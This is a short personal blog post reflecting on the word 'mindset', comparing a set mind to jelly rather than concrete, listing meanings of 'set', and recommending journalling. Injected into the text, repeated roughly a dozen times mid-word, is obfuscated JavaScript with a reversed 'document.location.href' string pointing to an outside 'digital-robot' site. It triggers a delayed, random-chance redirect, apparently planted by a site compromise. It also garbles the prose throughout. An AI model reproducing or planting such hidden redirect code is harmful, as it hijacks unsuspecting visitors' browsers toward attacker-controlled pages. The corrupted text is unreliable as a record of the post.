What is Mindset?

It started when one of my Facebook friends said that she hated the word “Mindset”. 

She went on tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to explain “I don’t want my mind tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to be set – it sounds like having your head full of concrete”.

Is Your Mindset set like concrete?

Errrr, wait a minute … it might not be like that at all! In fact, if my mind is set, then it’s not set like concrete, it’s set like jelly.

And if I’m perfectly honest, my mindset often wobbles like jelly tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}too.

And that’s OK!

What if your Mindset is not set at all?

In fact, the more I thought about it, the more I like the idea that my mind is set like jelly. It’s fruity and flavoursome. It’s full of variety. It could be like jelly tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tots one day (remember them?), and be like the base of a trifle the next. It could even be like a jelly fish or like the middle of a doughnut.

But perhaps thinking of my mind as jelly doesn’t always work.

How else can your Mindset be set?

Then it popped intobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to my head that “set” can mean other things, not just set like a jelly, or set like concrete. 

  • “Set” can mean a group of things, like a set of tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tools, or a set of cutlery. 
  • It can mean a series of songs played at a concert
  • Or a series of steps that make up a dance.
  • Set can mean tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to place things ready, for example “set the table” or “set out the chairs”.
  • And if you’re a sailor at sea, “set” means the direction of the wind and waves, which are of course ever-changing. 
  • In psychology, set means a temporary state, characterised by a readiness tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to respond.

The important thing is that mindset is changeable and adaptable. It isn’t ever set like concrete. You can let your Mindset take on many different shapes, and you can choose a different mindset for everything that you do.

When your mindset wobbles…

We all have mindset wobbles. Those days when you feel negative, and full of doubts. You probably didn’t deliberately choose a negative mindset. It’s more likely that you’ve still got some limiting beliefs which are holding you back.

If you choose a growth mindset, it especially encourages constant change and development.

And choosing a positive mindset helps you tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to actively look for opportunities tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to grow and learn.

So what kind of mindset do you have?

I love journalling as a way of working out my thoughts and feelings, exploring new ideas, planning or just dreaming. I think of it as a kind of mental doodling.
